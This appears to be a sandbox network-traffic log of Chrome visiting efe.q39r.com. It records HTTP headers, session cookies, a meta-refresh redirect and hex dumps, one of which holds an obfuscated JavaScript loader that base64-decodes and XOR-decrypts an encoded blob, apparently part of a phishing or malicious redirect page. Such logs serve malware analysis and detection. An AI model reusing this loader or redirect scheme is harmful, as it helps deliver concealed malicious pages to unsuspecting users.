                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6InpTcm9QdUpMMjAwRzQ4MUZzNmZsT2c9PSIsInZhbHVlIjoiZGNNNmIyQnd2M1N2RWh3WFZOdlhlQW1VSDZGUHFjK0ZmZ21HdzlKSk10UFJTcVVkVlp5ZGJEUEczeWNDSzdRb05uM3g0UExtbktqaE1FekkySmdqaXE0NzQ1VlM4Rld3TXRWYVR1dzNNUUZCdm9TZzNLSnlJNE9VUHZoMEVrYmUiLCJtYWMiOiIyOWUxNDFmNGJiNzhhYzU1ZGZmMmIzMDA4MGEyMTc3ZTAwYmIzNTcyYTU3MTUzYWU1YTdhMGQyZGQyNWIxY2NlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im1iOUJZTEJIUjI5RzRkR2pOYkxGK3c9PSIsInZhbHVlIjoiTlFrK01nU2xGN2dST1RlWmNkdVlHRU00S3N1Mmg4S1BDa1N4RmlPQlY4WVFMZmp0SWpzdm5Wd2RmK2pOcWhTL0F5NFE0NVBFQjkxL0FxU3ZreTRhNTF2MExQT2Z5YmZQbjJMcFdnYUlyVUtmUVAvUjJDc1Nucmw3ak9VVzVERkEiLCJtYWMiOiJmMzcyOGQzOTgyYTFmNzkwYjJhMDIyMjFhNjFhMTIwZjY4MjI4MDMwZWYyN2JlNzhlNzEyOTEyZjY0ODE3Yzc3IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:32 UTC1174INHTTP/1.1 302 Found
                                                                                  Date: Thu, 25 Apr 2024 16:23:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, private
                                                                                  Location: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xOKGxtqmg0h4yQdd35Hast6m%2FRCO52I8scVF3sg6MFeTLqCA64KJH1Db2tb74xDBAe2BdpL4pGEMxxISFXy1jv9CVeZj7VwJ4acTTbEZe6aSA1kL1PS2%2BBwszoUWaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6ImNVbGFybGt1NFBzbWhMY3lGNmZURlE9PSIsInZhbHVlIjoiRWRCVm8yM0pBVUlGWkhjdEovQmtsZHpsN3dkYytMdXVVOUhBRkFBcXE4RnMyM05VRno1WUh4MjVNdlN5R0tJSlZSYmdsb2Q5MTNVcjhSVmlMRGNrT0tzR0ViSm1uN2toV0hXQ2VWVVRCODkyV2JsUWFuVEQrcnREbDU5TUFWUGciLCJtYWMiOiJhNTc4ODMyM2ViNjRlM2E2OTJiNDlkZjZmNzAzMzI5N2FiNjg5NmE1MWE4ZGQ4ZTFkMGU5Y2NkNDcwMjIwZWIxIiwidGFnIjoiIn0%3D; expires=Thu, 25-Apr-2024 18:23:32 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                  2024-04-25 16:23:32 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 42 4b 55 44 52 43 64 31 52 5a 62 7a 64 74 53 48 49 79 55 46 4e 4d 4f 45 78 49 59 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 65 6e 4a 7a 65 57 46 59 65 6b 55 77 62 58 42 70 52 6c 68 58 4c 33 4a 6d 52 48 59 35 59 6d 68 45 56 58 6c 32 4d 57 4e 33 4d 48 59 76 4e 6a 5a 4e 55 30 78 4f 57 55 34 32 56 6c 64 33 4f 48 6c 52 52 55 77 79 4b 7a 42 4e 53 44 41 32 5a 6d 68 43 55 33 68 34 5a 57 6b 30 4b 7a 56 53 64 47 73 31 63 46 41 31 56 57 64 4a 4b 31 6c 51 52 6c 68 76 62 46 42 55 63 33 4a 54 52 55 78 59 51 6c 4e 48 64 48 56 35 61 33 63 78 54 56 42 74 54 6a 63 35 4b 79 73 30 5a 48 46 7a 57 44 64 54 61 32 35 4f 59 32 31 35 59 54 67 79 61 31 59
                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjBKUDRCd1RZbzdtSHIyUFNMOExIYXc9PSIsInZhbHVlIjoienJzeWFYekUwbXBpRlhXL3JmRHY5YmhEVXl2MWN3MHYvNjZNU0xOWU42Vld3OHlRRUwyKzBNSDA2ZmhCU3h4ZWk0KzVSdGs1cFA1VWdJK1lQRlhvbFBUc3JTRUxYQlNHdHV5a3cxTVBtTjc5Kys0ZHFzWDdTa25OY215YTgya1Y
                                                                                  2024-04-25 16:23:32 UTC877INData Raw: 33 36 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 65 66 65 2e 71 33 39 72 2e 63 6f 6d 2f 38 35 37 31 35 37 36 34 37 32 35 34 34 34 36 32 33 33 33 37 37 38 56 6d 46 76 75 71 71 67 48 4f 53 4f 55 49 59 4c 58 44 47 4a 4a 4b 4d 54 46 43 52 45 44 54 58 59 58 4b 58 59 59 4b 47 43 4c 49 5a 56 4e 50 46 4d 48 4a 47 49 4e 42 48 56 49 3f 63 62 47 58 41 67 4c 4d 6c 55 4f 7a 62 58 5a 70 55 51 62 49 51 70 45 70 68 63 6a 56 42 59 4d
                                                                                  Data Ascii: 366<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYM
                                                                                  2024-04-25 16:23:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.1749744172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:32 UTC1536OUTGET /8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-Dest: document
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Referer: https://efe.q39r.com/efe/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6ImNVbGFybGt1NFBzbWhMY3lGNmZURlE9PSIsInZhbHVlIjoiRWRCVm8yM0pBVUlGWkhjdEovQmtsZHpsN3dkYytMdXVVOUhBRkFBcXE4RnMyM05VRno1WUh4MjVNdlN5R0tJSlZSYmdsb2Q5MTNVcjhSVmlMRGNrT0tzR0ViSm1uN2toV0hXQ2VWVVRCODkyV2JsUWFuVEQrcnREbDU5TUFWUGciLCJtYWMiOiJhNTc4ODMyM2ViNjRlM2E2OTJiNDlkZjZmNzAzMzI5N2FiNjg5NmE1MWE4ZGQ4ZTFkMGU5Y2NkNDcwMjIwZWIxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjBKUDRCd1RZbzdtSHIyUFNMOExIYXc9PSIsInZhbHVlIjoienJzeWFYekUwbXBpRlhXL3JmRHY5YmhEVXl2MWN3MHYvNjZNU0xOWU42Vld3OHlRRUwyKzBNSDA2ZmhCU3h4ZWk0KzVSdGs1cFA1VWdJK1lQRlhvbFBUc3JTRUxYQlNHdHV5a3cxTVBtTjc5Kys0ZHFzWDdTa25OY215YTgya1YiLCJtYWMiOiI2NGQ2NmM1MzAwYzNmYzdlZTQ4Zjk5ZDMyOTc2MmViNzU1YjVlNjhmYjFjMzJjNjdiZjBjMDQ3NzJkY2VhYzg3IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:32 UTC1007INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, private
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mKseRjUu%2FIZ1d%2BiKujp5FoSvY8T5uV51bydti7zUEZ7QB0N6nYGq5k%2FvhoYBDcyS4mww5QjnLtM29zTAb2z9P%2BEr8bAUcY3Vwva1Qxozz7W7RVaKynIPEGYIOs97Jg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; expires=Thu, 25-Apr-2024 18:23:32 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                  2024-04-25 16:23:32 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 5a 42 56 47 6c 44 56 33 6c 79 4f 57 4a 58 4d 47 31 79 54 6c 70 34 63 48 45 77 54 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 45 46 4f 4c 33 4e 36 4c 30 78 51 4f 57 70 57 63 33 4e 59 57 6d 31 74 4d 45 31 68 5a 30 63 72 5a 6b 34 31 51 6b 51 72 54 45 5a 4a 57 54 42 35 56 54 4a 6d 56 46 70 6e 64 55 64 7a 56 56 52 58 54 47 70 42 51 56 55 79 65 46 46 70 59 33 4e 59 4e 56 59 33 56 6e 4e 32 4e 58 52 49 61 58 56 57 62 45 59 33 4e 55 4e 4f 4e 48 52 49 63 7a 6c 4b 64 79 73 34 57 57 5a 54 62 54 64 48 61 57 6b 31 65 45 31 51 52 7a 6c 6c 4e 56 6c 36 56 31 4a 6c 57 58 70 53 4d 79 39 46 56 32 68 74 62 56 6b 34 65 48 52 47 63 33 52 6c 4e 47 49
                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGI
                                                                                  2024-04-25 16:23:32 UTC1369INData Raw: 36 61 65 37 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 46 4d 63 50 69 49 4a 5a 46 42 28 54 53 62 4e 56 46 6f 5a 6f 68 2c 20 54 62 48 6f 54 5a 62 74 64 63 29 20 7b 0d 0a 6c 65 74 20 77 59 71 66 51 6d 42 65 57 77 20 3d 20 27 27 3b 0d 0a 54 53 62 4e 56 46 6f 5a 6f 68 20 3d 20 61 74 6f 62 28 54 53 62 4e 56 46 6f 5a 6f 68 29 3b 0d 0a 6c 65 74 20 72 78 70 44 4d 41 51 4e 62 49 20 3d 20 54 62 48 6f 54 5a 62 74 64 63 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 54 53 62 4e 56 46 6f 5a 6f 68 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 77 59 71 66 51 6d 42 65 57 77 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 54 53 62 4e 56 46 6f 5a 6f 68 2e 63 68 61 72 43
                                                                                  Data Ascii: 6ae7<script>function FMcPiIJZFB(TSbNVFoZoh, TbHoTZbtdc) {let wYqfQmBeWw = '';TSbNVFoZoh = atob(TSbNVFoZoh);let rxpDMAQNbI = TbHoTZbtdc.length;for (let i = 0; i < TSbNVFoZoh.length; i++) { wYqfQmBeWw += String.fromCharCode(TSbNVFoZoh.charC
                                                                                  2024-04-25 16:23:32 UTC1369INData Raw: 6e 47 42 4a 53 44 6a 55 33 55 6c 42 30 4c 77 4e 65 42 6c 55 37 4b 46 45 4c 64 47 6b 50 51 68 30 4a 50 79 68 46 42 44 45 67 41 67 31 51 47 79 49 6f 57 52 51 37 4a 68 6c 44 55 45 52 42 54 52 64 4e 64 6d 6c 51 58 42 73 55 4a 32 64 46 43 44 70 30 54 6b 41 41 48 79 41 6f 56 67 6c 30 61 51 52 43 46 78 78 78 5a 51 35 64 44 67 51 44 64 30 55 6a 42 67 6c 6d 57 57 34 49 4b 51 63 67 51 78 34 69 55 53 38 41 65 7a 73 44 4b 43 70 38 45 32 55 5a 4e 79 74 62 41 56 42 61 4c 54 51 4b 54 7a 41 6d 41 6b 52 51 57 6a 67 2b 52 77 68 72 61 77 70 66 48 41 35 6a 4d 46 67 4c 4d 48 74 4f 45 42 45 49 49 7a 52 45 41 69 51 67 43 31 6b 63 52 32 34 6d 57 51 49 34 4d 41 46 66 42 77 6c 75 65 54 70 6e 64 6d 6c 4d 45 45 34 57 4a 53 6c 63 54 53 51 73 41 41 31 51 43 6a 34 69 57 77 49 33 4c 55
                                                                                  Data Ascii: nGBJSDjU3UlB0LwNeBlU7KFELdGkPQh0JPyhFBDEgAg1QGyIoWRQ7JhlDUERBTRdNdmlQXBsUJ2dFCDp0TkAAHyAoVgl0aQRCFxxxZQ5dDgQDd0UjBglmWW4IKQcgQx4iUS8AezsDKCp8E2UZNytbAVBaLTQKTzAmAkRQWjg+RwhrawpfHA5jMFgLMHtOEBEIIzREAiQgC1kcR24mWQI4MAFfBwlueTpndmlMEE4WJSlcTSQsAA1QCj4iWwI3LU
                                                                                  2024-04-25 16:23:32 UTC1369INData Raw: 50 55 31 32 61 55 77 51 55 6c 70 73 5a 78 64 4e 64 69 73 44 51 68 59 66 50 6e 30 58 58 79 59 78 54 45 4d 64 46 69 55 6a 46 30 35 69 65 56 70 55 45 30 74 33 53 6a 31 4e 64 6d 6c 4d 45 46 4a 61 62 47 63 58 54 58 59 35 44 56 51 57 45 79 49 67 44 55 31 6a 4f 52 51 51 51 55 6f 38 50 77 78 67 58 47 6c 4d 45 46 4a 61 62 47 63 58 54 58 5a 70 54 46 59 64 46 44 68 71 52 41 51 73 4c 46 59 51 51 30 38 38 50 77 78 67 58 47 6c 4d 45 46 4a 61 62 47 63 58 54 58 5a 70 54 46 4d 48 43 44 38 6f 52 56 64 32 4f 51 4e 5a 48 41 34 70 4e 51 78 67 58 47 6c 4d 45 46 4a 61 62 47 63 58 45 46 74 44 54 42 42 53 57 6b 46 4e 46 30 31 32 61 55 77 51 55 6c 70 69 4a 55 4d 44 62 43 45 44 52 68 63 49 62 44 77 36 5a 33 5a 70 54 42 42 53 57 6d 78 6e 46 30 31 32 61 51 35 52 45 52 45 72 4e 56 67
                                                                                  Data Ascii: PU12aUwQUlpsZxdNdisDQhYfPn0XXyYxTEMdFiUjF05ieVpUE0t3Sj1NdmlMEFJabGcXTXY5DVQWEyIgDU1jORQQQUo8PwxgXGlMEFJabGcXTXZpTFYdFDhqRAQsLFYQQ088PwxgXGlMEFJabGcXTXZpTFMHCD8oRVd2OQNZHA4pNQxgXGlMEFJabGcXEFtDTBBSWkFNF012aUwQUlpiJUMDbCEDRhcIbDw6Z3ZpTBBSWmxnF012aQ5RERErNVg
                                                                                  2024-04-25 16:23:32 UTC1369INData Raw: 42 51 6a 4d 42 39 45 62 55 52 6d 45 46 4a 61 62 43 4a 42 44 44 70 68 53 31 51 58 47 44 6b 67 55 41 67 6b 62 6b 55 4c 66 33 42 73 5a 78 64 4e 4e 53 59 43 51 77 5a 61 4f 48 59 58 55 48 59 4e 44 55 51 58 56 43 49 6f 51 45 56 2f 63 6d 45 36 55 6c 70 73 5a 30 70 42 64 6e 68 63 41 45 4a 54 64 30 6f 39 54 58 5a 70 54 41 78 64 43 53 38 31 58 68 30 69 64 32 45 36 54 6c 55 6b 49 6c 59 4a 61 45 52 6d 50 58 68 47 4c 69 68 54 46 48 59 71 41 46 45 42 43 58 46 6c 52 42 6b 33 4f 78 68 65 46 77 31 75 65 54 70 6e 61 69 30 46 52 6c 49 54 4b 48 6f 56 48 6a 4d 71 47 46 6b 64 46 44 39 6c 46 77 34 36 4b 42 39 44 54 31 68 75 65 54 70 6e 64 6d 6c 4d 45 45 34 4a 4b 53 52 44 42 44 6b 6e 54 46 6b 57 52 32 34 30 55 67 34 69 49 41 4e 65 4c 51 34 2b 50 6c 34 44 4d 54 30 44 51 78 73 64
                                                                                  Data Ascii: BQjMB9EbURmEFJabCJBDDphS1QXGDkgUAgkbkULf3BsZxdNNSYCQwZaOHYXUHYNDUQXVCIoQEV/cmE6UlpsZ0pBdnhcAEJTd0o9TXZpTAxdCS81Xh0id2E6TlUkIlYJaERmPXhGLihTFHYqAFEBCXFlRBk3OxheFw1ueTpnai0FRlITKHoVHjMqGFkdFD9lFw46KB9DT1hueTpndmlMEE4JKSRDBDknTFkWR240Ug4iIANeLQ4+Pl4DMT0DQxsd
                                                                                  2024-04-25 16:23:32 UTC1369INData Raw: 64 68 4f 6c 4a 61 62 47 63 58 54 58 5a 70 55 42 38 57 45 7a 70 35 4f 6d 64 32 61 55 77 51 54 6c 55 2f 49 6c 51 5a 50 79 59 43 44 6e 39 77 51 55 30 58 54 58 5a 70 55 45 4d 58 47 54 67 75 57 41 4e 32 49 41 67 4e 55 41 6b 70 4a 45 4d 45 4f 53 63 7a 52 52 77 62 49 53 49 56 54 54 55 6c 44 55 4d 42 52 32 34 6a 47 67 4d 35 4a 77 6b 53 54 48 64 47 5a 78 64 4e 64 6d 6c 4d 45 46 4a 47 4b 43 35 42 54 54 55 6c 44 55 4d 42 52 32 34 6d 51 68 6b 2b 5a 42 74 43 45 77 6f 38 49 6b 56 50 61 45 52 6d 45 46 4a 61 62 47 63 58 54 58 5a 70 54 42 42 53 52 69 67 75 51 55 30 31 4a 51 31 44 41 55 64 75 4b 31 67 4d 4d 69 41 43 56 31 38 5a 49 79 6c 44 44 44 38 6e 43 55 4a 51 52 45 46 4e 46 30 31 32 61 55 77 51 55 6c 70 73 5a 78 64 4e 64 6d 6c 4d 45 45 34 65 4a 54 45 58 44 6a 6f 6f 48
                                                                                  Data Ascii: dhOlJabGcXTXZpUB8WEzp5Omd2aUwQTlU/IlQZPyYCDn9wQU0XTXZpUEMXGTguWAN2IAgNUAkpJEMEOSczRRwbISIVTTUlDUMBR24jGgM5JwkSTHdGZxdNdmlMEFJGKC5BTTUlDUMBR24mQhk+ZBtCEwo8IkVPaERmEFJabGcXTXZpTBBSRiguQU01JQ1DAUduK1gMMiACV18ZIylDDD8nCUJQREFNF012aUwQUlpsZxdNdmlMEE4eJTEXDjooH
                                                                                  2024-04-25 16:23:32 UTC1369INData Raw: 53 42 54 6b 6c 43 46 55 41 52 32 34 43 57 67 77 2f 4a 55 41 51 41 68 49 6a 4b 56 4a 42 64 69 59 65 45 43 45 52 4e 54 64 53 54 33 5a 6d 55 6a 31 34 57 6d 78 6e 46 30 31 32 61 55 77 51 55 6c 70 73 5a 78 64 4e 64 6e 56 44 56 42 73 4d 63 6b 6f 39 54 58 5a 70 54 42 42 53 57 6d 78 6e 46 30 31 32 64 51 68 5a 42 46 6f 76 4b 31 59 65 4a 58 52 4f 55 68 30 4f 4f 43 68 61 48 6a 4d 71 47 46 6b 64 46 47 35 35 43 78 31 32 4b 67 42 52 41 51 6c 78 5a 56 6f 50 65 33 68 61 45 6b 77 30 49 32 64 57 44 6a 55 6d 47 56 34 47 52 57 78 37 56 6b 30 2b 4f 77 6c 57 54 31 68 76 5a 52 63 4a 4e 7a 30 4e 48 52 73 65 63 57 56 45 42 44 45 6e 47 55 42 51 57 69 4d 70 56 41 45 2f 4b 67 63 4e 55 42 59 6c 4b 56 77 43 4a 6a 30 46 58 78 77 5a 49 43 35 55 42 6e 34 39 42 46 6b 42 55 32 35 6e 56 41
                                                                                  Data Ascii: SBTklCFUAR24CWgw/JUAQAhIjKVJBdiYeECERNTdST3ZmUj14WmxnF012aUwQUlpsZxdNdnVDVBsMcko9TXZpTBBSWmxnF012dQhZBFovK1YeJXROUh0OOChaHjMqGFkdFG55Cx12KgBRAQlxZVoPe3haEkw0I2dWDjUmGV4GRWx7Vk0+OwlWT1hvZRcJNz0NHRsecWVEBDEnGUBQWiMpVAE/KgcNUBYlKVwCJj0FXxwZIC5UBn49BFkBU25nVA
                                                                                  2024-04-25 16:23:32 UTC1369INData Raw: 52 6d 4d 6a 58 68 74 6f 52 47 59 51 55 6c 70 73 5a 78 64 4e 64 6d 6c 4d 45 46 4a 61 62 47 63 58 55 54 49 67 47 68 41 52 46 69 30 30 52 46 42 30 4c 51 4e 45 58 78 77 67 4b 46 59 5a 50 79 63 4c 45 6b 78 47 59 79 4e 65 47 32 68 45 5a 68 42 53 57 6d 78 6e 46 30 31 32 61 55 77 51 55 6c 70 73 5a 78 64 52 4d 69 41 61 45 42 45 57 4c 54 52 45 55 48 51 74 41 30 52 66 48 43 41 6f 56 68 6b 2f 4a 77 73 53 54 45 5a 6a 49 31 34 62 61 45 52 6d 45 46 4a 61 62 47 63 58 54 58 5a 70 54 42 42 53 57 6d 78 6e 46 31 45 79 49 42 6f 51 45 52 59 74 4e 45 52 51 64 43 30 44 52 46 38 63 49 43 68 57 47 54 38 6e 43 78 4a 4d 52 6d 4d 6a 58 68 74 6f 52 47 59 51 55 6c 70 73 5a 78 64 4e 64 6d 6c 4d 45 46 4a 61 62 47 63 58 55 54 49 67 47 68 41 52 46 69 30 30 52 46 42 30 4c 51 4e 45 58 78 77
                                                                                  Data Ascii: RmMjXhtoRGYQUlpsZxdNdmlMEFJabGcXUTIgGhARFi00RFB0LQNEXxwgKFYZPycLEkxGYyNeG2hEZhBSWmxnF012aUwQUlpsZxdRMiAaEBEWLTREUHQtA0RfHCAoVhk/JwsSTEZjI14baERmEFJabGcXTXZpTBBSWmxnF1EyIBoQERYtNERQdC0DRF8cIChWGT8nCxJMRmMjXhtoRGYQUlpsZxdNdmlMEFJabGcXUTIgGhARFi00RFB0LQNEXxw
                                                                                  2024-04-25 16:23:32 UTC1369INData Raw: 41 49 4d 58 52 67 35 4d 30 4d 43 4f 48 64 68 4f 6c 4a 61 62 47 63 58 54 58 5a 70 54 42 42 53 57 6e 42 6f 55 77 51 67 64 32 45 36 55 6c 70 73 5a 78 64 4e 64 6d 6c 51 48 78 59 54 4f 6e 6b 36 5a 33 5a 70 54 42 42 4f 56 54 38 69 56 42 6b 2f 4a 67 49 4f 66 33 42 42 54 52 64 4e 64 6d 6c 51 51 78 63 5a 4f 43 35 59 41 33 59 67 43 41 31 51 43 53 6b 6b 51 77 51 35 4a 7a 4e 4a 48 51 38 6f 4b 46 6b 5a 50 69 67 61 56 52 4d 5a 4c 79 4a 45 48 6e 52 70 44 31 77 54 43 54 39 36 46 51 6c 37 4a 77 4e 65 46 31 68 79 53 6a 31 4e 64 6d 6c 4d 45 46 4a 61 62 48 74 54 42 43 42 70 44 31 77 54 43 54 39 36 46 51 77 6a 50 51 51 64 42 51 67 74 4e 30 63 49 4a 47 74 53 50 58 68 61 62 47 63 58 54 58 5a 70 54 42 42 53 57 6d 78 37 55 77 51 67 61 51 39 63 45 77 6b 2f 65 68 55 42 4f 53 67 49
                                                                                  Data Ascii: AIMXRg5M0MCOHdhOlJabGcXTXZpTBBSWnBoUwQgd2E6UlpsZxdNdmlQHxYTOnk6Z3ZpTBBOVT8iVBk/JgIOf3BBTRdNdmlQQxcZOC5YA3YgCA1QCSkkQwQ5JzNJHQ8oKFkZPigaVRMZLyJEHnRpD1wTCT96FQl7JwNeF1hySj1NdmlMEFJabHtTBCBpD1wTCT96FQwjPQQdBQgtN0cIJGtSPXhabGcXTXZpTBBSWmx7UwQgaQ9cEwk/ehUBOSgI
                                                                                  2024-04-25 16:23:32 UTC1369INData Raw: 49 66 4e 53 78 43 50 58 68 61 62 47 63 58 54 58 5a 70 54 42 42 53 57 6d 78 37 47 41 6b 2f 50 31 49 39 65 46 70 73 5a 78 64 4e 64 6d 6c 4d 45 46 4a 61 62 48 74 54 42 43 42 70 44 31 77 54 43 54 39 36 46 52 51 35 50 41 68 66 48 41 34 6b 4a 6b 45 49 4e 79 6f 50 56 51 45 4a 4c 69 68 44 47 54 6b 6b 54 67 35 2f 63 47 78 6e 46 30 31 32 61 55 77 51 55 6c 70 73 5a 77 73 4a 50 7a 39 4d 55 78 34 62 50 7a 51 4b 54 79 38 6d 47 56 51 64 46 44 67 76 56 68 73 7a 4b 41 39 54 46 77 6b 2f 4a 56 67 5a 49 69 59 42 58 77 49 4f 4a 53 68 5a 54 54 41 6d 48 6c 31 66 48 54 34 6f 51 68 31 30 64 32 45 36 55 6c 70 73 5a 78 64 4e 64 6d 6c 4d 45 46 4a 61 63 43 59 58 43 54 63 39 44 52 30 62 48 6e 46 6c 5a 42 6f 2f 50 51 39 59 4a 77 6b 70 4e 52 56 4e 4f 53 63 50 58 42 73 5a 4a 33 6f 56 41
                                                                                  Data Ascii: IfNSxCPXhabGcXTXZpTBBSWmx7GAk/P1I9eFpsZxdNdmlMEFJabHtTBCBpD1wTCT96FRQ5PAhfHA4kJkEINyoPVQEJLihDGTkkTg5/cGxnF012aUwQUlpsZwsJPz9MUx4bPzQKTy8mGVQdFDgvVhszKA9TFwk/JVgZIiYBXwIOJShZTTAmHl1fHT4oQh10d2E6UlpsZxdNdmlMEFJacCYXCTc9DR0bHnFlZBo/PQ9YJwkpNRVNOScPXBsZJ3oVA


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.1749745172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:32 UTC1397OUTGET /34fI8EabNdid6714 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: text/css,*/*;q=0.1
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: style
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
